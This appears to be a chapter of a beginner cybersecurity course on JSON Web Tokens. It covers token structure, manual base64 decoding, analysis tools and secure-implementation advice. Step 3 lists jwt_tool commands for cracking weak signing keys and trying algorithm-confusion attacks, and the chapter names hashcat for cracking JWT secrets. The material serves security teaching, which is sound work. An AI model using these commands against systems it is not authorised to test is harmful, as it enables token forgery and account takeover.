JSON Web Tokens (JWT)
Understanding and Analyzing Web Authentication
What You'll Discover
🎯 Why This Matters
JSON Web Tokens power the login systems of millions of websites and apps you use daily. Understanding how they work - and where they can go wrong - is essential knowledge for anyone serious about cybersecurity. You'll learn to spot vulnerabilities that even experienced developers miss.
🔍 What You'll Learn
By the end of this chapter, you'll understand exactly how web authentication works behind the scenes. You'll be able to analyze any JWT token, identify security weaknesses, and know the professional techniques security experts use to test these systems.
🚀 Your First Win
Within the next 5 minutes, you'll decode your first JWT token and understand its structure. This same technique is used by security professionals worldwide. The CVE.org database shows how critical these skills are in real-world security.
🔧 Try This Right Now
Here's a real JWT token from a web application. Let's decode it together to see what's inside:
# Copy this token - it's from a test application
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
# Decode the first part (the header) - add padding for base64url
echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9===" | base64 -d
# Decode the second part (the data) - add padding for base64url
echo "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ===" | base64 -dYou'll see: The token contains readable information about a user named "John Doe" - this is how web apps know who you are when you're logged in!
Skills You'll Master
✅ Core Understanding
- How web authentication actually works (no more mystery!)
- Reading and understanding JWT tokens like a pro
- Spotting the difference between secure and vulnerable systems
- Using the same tools that security experts rely on
🔍 Professional Skills
- Analyzing authentication systems for weaknesses
- Testing web applications like a security consultant
- Understanding attack methods to build better defenses
- Communicating security findings clearly and professionally
Understanding JWT Structure
Think of a JWT token like a digital ID card. Just like your driver's license has different sections (photo, name, address), a JWT has three distinct parts that work together to prove who you are to a website.
Every JWT follows this pattern: header.payload.signature
Three sections separated by dots - each one has a specific job
Header: The "Type" Section
This tells the website what kind of token it's looking at and how to verify it's genuine - like the "Driver License" text on your ID.
What's Inside
alg: Which security method is usedtyp: Confirms this is a JWT tokenkid: Which security key to use (optional)
{
"alg": "HS256",
"typ": "JWT",
"kid": "2024-key-01"
}Payload: The "Info" Section
This contains the actual information about the user - like the name, photo, and address on your driver's license.
Types of Information
- Standard: User ID, expiration time, who issued it
- Public: Widely-recognized information types
- Custom: App-specific data like user roles
{
"sub": "user_001",
"iss": "auth.company.com",
"exp": 1643723400,
"roles": ["analyst"]
}Signature: The "Security" Section
This is like the holographic strip on your ID - it proves the token is authentic and hasn't been tampered with.
How It Works
- Integrity: Detects if anyone changed the data
- Authenticity: Proves it came from the right source
- Algorithm: Uses HMAC, RSA, or ECDSA encryption
HMACSHA256(
base64UrlEncode(header) + "." +
base64UrlEncode(payload),
secret_key
)Your Learning Path
Security professionals use a systematic approach to analyze authentication systems. Here's the proven method you'll master, broken down into clear steps:
Step 1: Manual Analysis (Start Here)
First, you'll learn to examine tokens by hand. This builds your understanding and helps you recognize patterns that automated tools might miss.
# Take any JWT token and break it apart
TOKEN="your_jwt_token_here"
# Extract each section (they're separated by dots) - add padding for base64url
echo "$(echo "$TOKEN" | cut -d'.' -f1)===" | base64 -d | jq .
echo "$(echo "$TOKEN" | cut -d'.' -f2)===" | base64 -d | jq .
# Look at the signature (this stays encrypted)
echo "$TOKEN" | cut -d'.' -f3What you'll discover: Most of the token is readable! Only the signature is encrypted. This is by design - the security comes from the signature, not hiding the data.
Step 2: Using Professional Tools
Once you understand the basics, you'll use the same web tools that security professionals rely on for quick analysis.
Pro Tip: Visit https://jwt.io/ and paste any JWT token. You'll instantly see all three sections decoded, plus verification of whether the signature is valid. Bookmark this - you'll use it constantly!
Step 3: Advanced Security Testing
Finally, you'll learn to use specialized security tools that can automatically test for common vulnerabilities and attack patterns.
# Get the industry-standard JWT testing tool
git clone https://github.com/ticarpi/jwt_tool.git
cd jwt_tool
# Analyze the token structure and security
python3 jwt_tool.py $TOKEN # Basic analysis and decoding
python3 jwt_tool.py $TOKEN -C -d wordlist.txt # Test for weak keys
python3 jwt_tool.py $TOKEN -X a # Try algorithm confusion attacksWhat this does: These commands test for the most common JWT vulnerabilities automatically. It's like having a security expert check the token for you!
Essential Tools You'll Use
Security professionals don't memorize everything - they know which tools to use and when. Here are the essential JWT tools you should know about:
Quick Analysis Tools
JWT.io (Essential)
Instant token decoding and validation. Perfect for understanding what's inside any JWT token. Free and works in your browser.
Token.dev (Advanced)
More detailed analysis with security scoring and vulnerability detection. Great for deeper investigation.
Professional Testing Tools
JWT_Tool (Industry Standard)
The tool security consultants use for comprehensive JWT testing. Finds vulnerabilities automatically.
Hashcat (Industry Standard)
The most widely-used password cracking tool with excellent JWT secret cracking capabilities. What security professionals actually use for testing weak JWT keys.
💡 Pro Strategy: Start with JWT.io for every token, then use JWT_Tool when you find something interesting!
Building Secure Systems
Understanding attacks makes you better at defense. Here's what you need to know to build and recognize secure JWT implementations:
Security Essentials
- Use strong, randomly generated secrets (never use "secret" or "password"!)
- Always verify the algorithm matches what you expect
- Set reasonable expiration times (usually 15 minutes to 1 hour)
- Validate every piece of data in the token
- Always use HTTPS - never send tokens over plain HTTP
Common Mistakes to Avoid
- Never accept the "none" algorithm (this disables security entirely)
- Don't let attackers change the algorithm type
- Use RSA/ECDSA for public-facing systems, not just HMAC
- Implement proper token revocation (blacklisting)
- Monitor for unusual token patterns and failed verifications
🎯 Your JWT Expertise is Complete!
You now understand web authentication like a security professional. You can analyze any JWT token, identify vulnerabilities, and know how to build secure systems.
Ready to Apply Your Skills to Real-World Scenarios